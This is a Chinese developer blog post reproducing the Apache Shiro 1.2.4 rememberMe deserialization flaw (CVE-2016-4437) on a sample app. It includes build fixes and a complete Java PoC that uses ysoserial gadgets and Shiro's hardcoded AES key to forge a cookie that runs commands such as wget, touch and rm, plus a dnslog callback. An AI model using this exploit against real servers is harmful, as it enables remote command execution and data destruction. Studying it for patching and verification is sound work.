shiro1.2.4反序列化漏洞(CVE-2016-4437)的问题分析(一)

已于 2022-08-05 17:51:56 修改
阅读量1.2k 收藏
点赞数
文章标签: java 开发语言 安全
于 2022-07-26 15:18:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/donggongai/article/details/125995529
版权

记录Java开发中的问题,一起成长!

问题背景:在某个项目中依赖了shiro1.2.4,结果收到了网警的一纸警告,警告上明确写道存在CVE-2016-4437以及造成此漏洞的罪魁祸首是使用了<=1.2.4版本的shiro。

复现CVE-2016-4437

漏洞是有了,那么这个漏洞到底有多严重呢?我们来复现一下这个问题。

需要用到的工具:

ysoserial源码或jar包

shiro-root源码(主要使用里面的samples-web子项目)可以从官网下载,不过这里直接提供一个编译好的压缩包

如果使用的是我们提供的编译好的压缩包下面的信息可以不看了:

shiro-root项目如果下载源码编译可能会出现如下错误:

  1. maven-toolchains-plugin错误
[ERROR] Failed to execute goal org.apache.maven.plugins:maven-toolchains-plugin:  
1.1:toolchain (default) on project shiro-samples: Cannot find matching toolchain  
 definitions for the following toolchain types:  
[ERROR] jdk [ vendor='sun' version='1.6' ]  
[ERROR] Please make sure you define the required toolchains in your ~/.m2/toolchains.xml file.

这是因为shiro-root-1.2.4.pom中使用了maven-toolchains-plugin,而maven中没有配置toolchain导致无法编译(toolchain可以指定编译时使用的jdk版本),见shiro-root-1.2.4.pom中的maven-toolchains-plugin:

<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-toolchains-plugin</artifactId>
  <version>1.1</version>
  <configuration>
    <toolchains>
      <jdk>
        <version>1.6</version>
        <vendor>sun</vendor>
      </jdk>
    </toolchains>
  </configuration>
  <executions>
    <execution>
      <goals>
        <goal>toolchain</goal>
      </goals>
    </execution>
  </executions>
</plugin>

这里定义了1.6版本的JDK的目录,当然,你也可以定义多个toolchain。
ok,大功告成!
如果需要了解更多关于toolchain的信息,可以看这里:
http://maven.apache.org/guides/mini/guide-using-toolchains.html

2、Maven打包web项目报错:webxml attribute is required (or pre-existing WEB-INF/web.xml if executing in update)
第一种、在pom.xml文件中定义一个参数配置

<properties>
        <failOnMissingWebXml>false</failOnMissingWebXml>
    </properties>

第二种、更新maven-war-plugin的版本

<plugin>
  <artifactId>maven-war-plugin</artifactId>
  <version>3.0.0</version>
</plugin>

第三种、在webapp目录下创建WEB-INF/web.xml

mvn package -Dmaven.test.skip=true

3、运行时还可能报错:

The
 absolute uri: [http://java.sun.com/jsp/jstl/core] cannot be resolved in
 either web.xml or the jar files deployed with this application

将jstl的版本改为为1.2
并引入collections4准备验证错误

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

3、访问
经过上面的步骤应该就可以部署成功了。部署成功后访问页面。

漏洞利用

项目已经有了,在项目的lib目录中放入commons-collections4-4.0.jar的jar包(有漏洞的jar包都可以,此处以commons-collections4-4.0.jar为例)。

编写java程序(需要依赖于ysoserial):

注意:CommonsCollections2针对的是commons-collections4-4.0的漏洞,如果是commons-collections:3.1使用CommonsCollections1,具体可以查看ysoserial.payloads的源码

package ysoserial;
 
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.security.Key;
 
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
 
import org.apache.commons.codec.binary.Base64;
 
import ysoserial.payloads.CommonsCollections2;
import ysoserial.payloads.ObjectPayload;
 
public class ShiroPOC {
 
    private static final byte[] keyBytes = Base64.decodeBase64("kPH+bIxk5D2deZiIxcaaaA==");
 
    public static void main(String[] args) {
        if (args.length != 2) {
            System.out.println("usage: java -jar shiroPoc.jar command pocPath");
        }
        // wget http://www.baidu.com
        // touch /tmp/kevintest.txt
        // exec calc
        // CommonsCollections2针对的是commons-collections4-4.0的漏洞,如果是commons-collections:3.1使用CommonsCollections1,具体可以查看ysoserial.payloads的源码
        ShiroPOC.run(CommonsCollections2.class, "wget http://www.baidu.com", "d:/tttttt.txt");
        //
        // http://www.dnslog.cn/getdomain.php 获取域名
        // http://www.dnslog.cn/getrecords.php 获取访问记录
        // ShiroPOC.run(URLDNS.class, "http://eoaw7y.dnslog.cn", "d:/tttttt1.txt"); //注意里面的域名需要重新获取可能已经过期
    }
 
    @SuppressWarnings({ "rawtypes" })
    public static void run(Class<? extends ObjectPayload> ObjectPayloadClz, String cmd, String filePath) {
        // 3个参数1类 2执行命令 3文件路径
        System.out.println("======================================================================");
 
        try {
 
//            String className = ObjectPayloadClz.getName();
 
//            Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
            ObjectPayload payload = (ObjectPayload) ObjectPayloadClz.newInstance();
            Object object = payload.getObject(cmd);
 
            byte[] objectBytes = toByteArray(object);
 
            byte[] objectEncriptBytes = aesEncrypt(objectBytes);
            System.out.println("加密后:" + objectEncriptBytes.length);
            System.out.println("");
 
            String strHex = parseByte2HexStr(objectEncriptBytes);
            System.out.println("转十六进制后:" + strHex);
            System.out.println("");
 
            byte[] hexTobyte = parseHexStr2Byte(strHex);
            System.out.println("转二进制后:" + hexTobyte);
            System.out.println(hexTobyte.length);
            System.out.println("");
 
            byte[] descBytes = AES_CBC_Decrypt(hexTobyte);
            System.out.println("解密后:" + new String(descBytes));
            System.out.println("");
 
            byte[] byteMerger = byteMerger(getIV(), hexTobyte);
            System.out.println(new String(byteMerger));
            System.out.println("");
            System.out.println("byteMerger length: " + byteMerger.length);
            System.out.println("");
            byte[] base64ByteMerger = Base64.encodeBase64(byteMerger);
            String base64MergerStr = new String(base64ByteMerger).replaceAll("\r|\n", "");
            System.out.println("rememberMe=" + base64MergerStr);
            System.out.println("");
 
            createFile(filePath, base64MergerStr);
 
            byte[] descriptByte = Base64.decodeBase64(base64MergerStr);
            byte[] objectByte = new byte[descriptByte.length - 16];
            System.arraycopy(descriptByte, 16, objectByte, 0, descriptByte.length - 16);
            byte[] decriptObj = AES_CBC_Decrypt(objectByte);
            System.out.println(new String(decriptObj));
 
        } catch (Exception e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
    }
 
    /**
     * 将16进制转换为二进制
     * 
     * @param hexStr
     * @return
     */
    public static byte[] parseHexStr2Byte(String hexStr) {
        if (hexStr.length() < 1)
            return null;
        byte[] result = new byte[hexStr.length() / 2];
        for (int i = 0; i < hexStr.length() / 2; i++) {
            int high = Integer.parseInt(hexStr.substring(i * 2, i * 2 + 1), 16);
            int low = Integer.parseInt(hexStr.substring(i * 2 + 1, i * 2 + 2), 16);
            result[i] = (byte) (high * 16 + low);
        }
        return result;
    }
 
    /**
     * 将二进制转换成16进制
     * 
     * @param buf
     * @return
     */
    public static String parseByte2HexStr(byte buf[]) {
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < buf.length; i++) {
            String hex = Integer.toHexString(buf[i] & 0xFF);
            if (hex.length() == 1) {
                hex = '0' + hex;
            }
            sb.append(hex.toUpperCase());
        }
        return sb.toString();
    }
 
    /**
     * 使用AES 算法 加密,默认模式 AES/CBC/PKCS5Padding
     */
    public static byte[] aesEncrypt(byte[] str) throws Exception {
 
        Key keySpec = new SecretKeySpec(keyBytes, "AES");
        IvParameterSpec ivSpec = new IvParameterSpec(getIV());
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
        /**
         * 初始化,此方法可以采用三种方式,按服务器要求来添加。(1)无第三个参数 (2)第三个参数为SecureRandom random = new SecureRandom();中random对象,随机数。(AES不可采用这种方法)
         * (3)采用此代码中的IVParameterSpec
         */
        byte[] b = cipher.doFinal(str);
        return b;
    }
 
    public static byte[] AES_CBC_Decrypt(byte[] content) {
 
        byte[] ret = null;
        try {
            IvParameterSpec ivSpec = new IvParameterSpec(getIV());
            Key key = new SecretKeySpec(keyBytes, "AES");
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            cipher.init(Cipher.DECRYPT_MODE, key, ivSpec);
            ret = cipher.doFinal(content);
        } catch (Exception e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
        return ret;
    }
 
    public static byte[] getIV() {
        String iv = "1234567812345678"; // IV length: must be 16 bytes long
        return iv.getBytes();
    }
 
    public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
        byte[] byte_3 = new byte[byte_1.length + byte_2.length];
        System.out.println("arry1长度:" + byte_1.length + "arry1长度:" + byte_2.length);
        System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);
        System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);
        return byte_3;
    }
 
    /**
     * 创建文件
     * 
     * @Title createFile
     * @author 吕凯
     * @date 2020年5月28日 上午10:26:53
     * @param path
     *            文件路径
     * @param str
     *            文件内容
     * @throws IOException
     *             void
     */
    public static void createFile(String path, String str) throws IOException {
 
        FileWriter fos = new FileWriter(path);
        fos.write(str);
        fos.flush();
        fos.close();
    }
 
    public static void createFile(String path, byte[] str) throws IOException {
 
        FileOutputStream fos = new FileOutputStream(path);
        fos.write(str);
        fos.flush();
        fos.close();
    }
 
    /**
     * 对象转数组
     * 
     * @param obj
     * @return
     */
    public static byte[] toByteArray(Object obj) {
        byte[] bytes = null;
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(obj);
            oos.flush();
            bytes = bos.toByteArray();
            oos.close();
            bos.close();
        } catch (IOException ex) {
            ex.printStackTrace();
        }
        return bytes;
    }
}

借助于http工具如Fiddler,在cookie中添加将rememberMe=上面生成的字符串,发起请求,到服务器上验证即可。

图片

如执行的命令为touch /tmp/kevintest.txt

则到服务器的tmp目录下可用看到多了kevintest.txt文件。可以将命令再改成rm /tmp/kevintest.txt看看,该文件被删除了,那么设想一下如果讲命令改成rm /tmp/*设置更危险的命令会有什么后果?

思考

如果上面的例子还不够明显,可以多试几个脚本,看看在服务器上的运行情况。基本上项目运行用户能支持的命令,都可以通过这个rememberMe注入执行。那么这个漏洞有多严重就不言而喻了吧。

那么这个漏洞到底是怎么造成的以及怎样解决,我们将在后续的文章中继续进行分析。

专注Java技术,我们一起学习一起进步吧

donggongai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
shiro1.2.4升级报错 org/owasp/encoder/Encode或者是org.owasp.encoder.Encode
11-16 2544
ApacheShiro反序列化远程代码执行 漏洞处理 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookierememberMe字段内容分别进行序列化、AES加密、Base64编码操作。但是,AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能漏洞描述拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将r
apache shiro 如何升级_springboot集成shiro
weixin_39955149的博客
11-26 159
一 前言本篇内容是关于shiro权限框架的使用,当然知识追寻者不会手把手傻瓜式的把代码给你,而是先要让你理解权限的核心是什么,shiro进行权限认证的流程,结合核心代码展现方式给大家;公众号:知识追寻者知识追寻者(Inheriting the spirit of open source, Spreading technology knowledge;) ...
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
m0_54850467的博客
03-31 416
文章目录 一、分析定位 1. 漏洞描述 2. 项目引发漏洞简述 二、 若依系统 2.1. 版本升级 2.2. 配置文件 2.3. 推荐做法 2.4. 栗子 2.5. 项目场景 三、Gus系统 3.1. shiro版本升级 3.2. 调用重新生成 3.3. 生成工具类 shiro漏洞补充: 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira
Shiro 那点事儿
LzwGlory的专栏
03-13 886
前几天我遇见了一位美女,真有种相逢恨晚的感觉。她皮肤白皙、气质优雅、楚楚动人,拥有苗条的身材,却又不失丰满之躯,正所谓“该大的地方大,该小的地方小”,她就是我朝思梦想的情人。 她就是 Apache 组织下的名媛 —— Shiro(希罗),一款轻量级 Java 安全框架。如果您已经玩腻了丰满的 Spring Security,想品尝一下新口味的话,建议先到她的裙下一睹风光吧: Apach
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom; 包含翻译后的API文档:commons-collections4-4.1-javadoc-API文档-中文(简体)版.zip; Maven坐标:org.apache.commons:commons-collections4:4.1; 标签:apache、commons、collections4、中文文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
guns shiro 升级
weixin_46008168的博客
11-12 808
背景 之前使用guns做的项目中,由于使用的是shiro,并且使用的是它默认的AES加密公共密钥,所以,存在安全问题。 解决 首先,需要先对shiro的版本进行升级,如果之前使用的是shiro 1.2.4之前的版本,那么会存在反序列化安全问题。 在1.2.4版本之前,shiro问题如下。 当浏览器发送remember Me Cookie的请求时,服务端的流程如下。 读取cookie -> base64解码 -> AES解密 -> 反序列化。 在1.2.4版本之前,这个AES加密的密钥是
关于windows下修复log4j2漏洞时,下载源码编译报错未定义toolchains的解决办法
hengxin54的专栏
12-13 1311
log4j2漏洞修复过程中,下载源码后编译报错问题的解决办法
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
m0_61506558的博客
11-06 2495
关于shiro在2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化漏洞,(一)基本介绍。
笔记:shiro和springboot整合流程及注意事项
FelixZFJ的博客
09-14 234
授权:认证通过之后,获取认证返回的用户对象,然后通过对象中的id属性编写sql,联表查询出对应的角色集合,再通过遍历角色集合返回一个只有角色Id的字符串,编写sql查询出对应的权限信息。注:单表可以直接由mapper/service搞定,多表查询还是需要写到xml中,然后调用对应的方法,返回需要的值。认证:获取token里存储的用户名,然后编写sql返回一个实体类对象,判断实体类是否为空,为空则抛出异常。4.最后需要添加全局异常,需要分别添加认证和授权两个异常,认证需要根据具体的异常设定不同的返回信息。
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具,ShiroExploit。 测试工具下载地址 ... 反序列化漏洞是如何产生的?...
poc-shiro授权绕过
m0_55772907的博客
10-20 342
shiro
Shiro 550 反序列化漏洞 详细分析+poc编写
热门推荐
god_Zeo的安全博客
09-03 1万+
0x00 前言 shiro反序列化漏洞这个从 shiro 550 开始,在2016年就爆出来, 但是到现在在各种攻防演练中也起到了显著作用 这个漏洞一直都很好用,特别是一些红蓝对抗HW的下边界突破很好用 遂研究一下这个漏洞的成因和分析一下代码 0x01 Shiro 550 漏洞描述 Apache Shiro RememberMe 反序列化导致的命令执行漏洞 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理 编号:Shiro-550, CVE-2016-4437
maven打包报错:Cannot find matching toolchain definitions for the following toolchain types
Song_MJ的博客
11-28 6234
报错信息: [ERROR] Failed to execute goal org.apache.maven.plugins:maven-toolchains-plugin:1.1:toolchain (default) on project myfile: Cannot find matching toolchain definitions for the following toolcha...
Java使用Cipher.getInstance(“AES/ECB/PKCS5Padding“);加解密算法工具类实现
九七的博客
08-01 8336
Java使用Cipher.getInstance("AES/ECB/PKCS5Padding");加解密算法工具类实现。
shiro反序列化漏洞(CVE-2016-4437)漏洞复现
HEAVEN569的博客
06-21 3836
本文对shiro反序列化漏洞(CVE-2016-4437),进行了分析复现,介绍了利用工具和常规修复方法
Apache Shiro 1.2.4反序列化漏洞
最新发布
07-27
- *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值